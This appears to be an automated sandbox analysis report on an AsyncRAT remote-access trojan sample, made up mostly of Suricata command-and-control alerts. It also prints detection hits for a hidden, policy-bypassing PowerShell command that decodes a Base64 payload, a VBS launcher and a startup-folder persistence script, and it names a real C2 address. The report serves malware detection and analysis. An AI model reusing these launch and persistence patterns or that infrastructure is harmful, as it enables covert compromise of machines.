  • 0x5968:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x86f4:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x5628:$cnc4: POST / HTTP/1.1
18.2.powershell.exe.1e1aa26a4b0.1.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security |

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
Source: Process started, Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Xclient.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Xclient.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Xclient.vbs", ProcessId: 7292, ProcessName: wscript.exe
Source: Process started, Author: frack113, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
Source: Process started, Author: Max Altgelt (Nextron Systems), Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\cdd.dll, NewProcessName: C:\Windows\System32\cdd.dll, OriginalFileName: C:\Windows\System32\cdd.dll, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: cdd.dll
Source: Process started, Author: Michael Haag, Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Xclient.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Xclient.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Xclient.vbs", ProcessId: 7292, ProcessName: wscript.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
Source: Process started, Author: vburov, Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5368, ProcessName: svchost.exe

Data Obfuscation

Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7456, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6dd171fd.cmd
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-15T20:45:02.726844+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 50015 | 204.79.197.203 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-15T20:43:34.598628+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.241.208.215 | 7000 | 192.168.2.4 | 49736 | TCP
2025-02-15T20:43:46.191438+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.241.208.215 | 7000 | 192.168.2.4 | 49736 | TCP
2025-02-15T20:43:52.078578+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.241.208.215 | 7000 | 192.168.2.4 | 49736 | TCP
2025-02-15T20:43:57.814150+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.241.208.215 | 7000 | 192.168.2.4 | 49736 | TCP
2025-02-15T20:44:09.424409+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.241.208.215 | 7000 | 192.168.2.4 | 49736 | TCP
2025-02-15T20:44:16.132806+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.241.208.215 | 7000 | 192.168.2.4 | 49736 | TCP
2025-02-15T20:44:22.079816+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.241.208.215 | 7000 | 192.168.2.4 | 49736 | TCP
2025-02-15T20:44:30.539595+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.241.208.215 | 7000 | 192.168.2.4 | 49741 | TCP
2025-02-15T20:45:39.955536+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.241.208.215 | 7000 | 192.168.2.4 | 50051 | TCP
2025-02-15T20:45:52.079853+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.241.208.215 | 7000 | 192.168.2.4 | 50051 | TCP
2025-02-15T20:45:53.777058+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.241.208.215 | 7000 | 192.168.2.4 | 50051 | TCP
2025-02-15T20:45:59.163248+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.241.208.215 | 7000 | 192.168.2.4 | 50051 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-15T20:43:34.624385+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49736 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:43:46.192912+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49736 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:43:57.853712+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49736 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:44:06.772243+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:44:06.996526+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:44:07.124893+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:44:07.234396+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:44:07.344034+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:44:07.468544+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:44:07.578359+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:44:07.703005+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:44:07.812533+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:44:07.921690+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:44:08.041096+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:44:08.140675+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:44:08.250084+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:44:08.359472+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:44:08.484168+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:44:08.615357+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:44:08.718633+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:44:08.827953+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:44:08.947197+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:44:09.046727+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:44:09.170616+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:44:09.285823+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:44:09.456448+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:44:09.625333+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49736 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:44:09.718568+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:44:09.828072+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:44:09.937533+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:44:10.074336+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:44:10.187410+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:44:10.296806+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:44:10.417846+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
2025-02-15T20:44:10.532933+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:10.640672+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:10.750825+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:10.866817+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:10.985467+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:11.126720+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:11.250700+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:11.436495+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:11.482756+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:11.635622+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:11.752453+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:11.917801+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:12.232133+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:12.399346+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:12.536215+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:12.664341+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:12.811358+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:12.955482+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:13.080173+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:13.204120+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:13.312674+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:13.421950+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:13.547059+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:13.656727+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:13.781895+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:13.890470+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:13.999922+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:14.109235+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:14.234340+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:14.344023+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:14.459354+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:14.608364+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:14.910934+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:15.063498+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:15.182211+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:15.297458+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:15.409110+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:15.531342+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:15.642172+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:15.767796+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:15.895376+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:16.047258+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:16.166688+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:16.301822+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:16.428869+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:16.574977+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:45:39.970391+010028529231Malware Command and Control Activity Detected192.168.2.450051185.241.208.2157000TCP
                2025-02-15T20:45:53.778510+010028529231Malware Command and Control Activity Detected192.168.2.450051185.241.208.2157000TCP
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2025-02-15T20:43:52.078578+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 185.241.208.215 | 7000 | 192.168.2.4 | 49736 | TCP
                2025-02-15T20:44:22.079816+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 185.241.208.215 | 7000 | 192.168.2.4 | 49736 | TCP
                2025-02-15T20:45:52.079853+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 185.241.208.215 | 7000 | 192.168.2.4 | 50051 | TCP
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2025-02-15T20:44:06.772243+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:06.996526+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:07.124893+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:07.234396+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:07.344034+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:07.468544+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:07.578359+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:07.703005+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:07.812533+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:07.921690+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:08.041096+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:08.140675+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:08.250084+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:08.359472+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:08.484168+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:08.615357+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:08.718633+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:08.827953+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:08.947197+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:09.046727+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:09.170616+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:09.285823+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:09.456448+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:09.718568+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:09.828072+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:09.937533+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:10.074336+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:10.187410+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:10.296806+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:10.417846+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:10.532933+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:10.640672+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:10.750825+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:10.866817+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:10.985467+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:11.126720+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:11.250700+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:11.436495+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:11.482756+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:11.635622+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:11.752453+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:11.917801+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:12.232133+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:12.399346+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:12.536215+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:12.664341+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:12.811358+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:12.955482+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:13.080173+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:13.204120+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:13.312674+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:13.421950+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:13.547059+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:13.656727+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:13.781895+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:13.890470+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:13.999922+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:14.109235+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:14.234340+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:14.344023+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:14.459354+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:14.608364+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:14.910934+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:15.063498+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:15.182211+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:15.297458+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:15.409110+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:15.531342+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:15.642172+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:15.767796+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:15.895376+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:16.047258+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:16.166688+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:16.301822+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
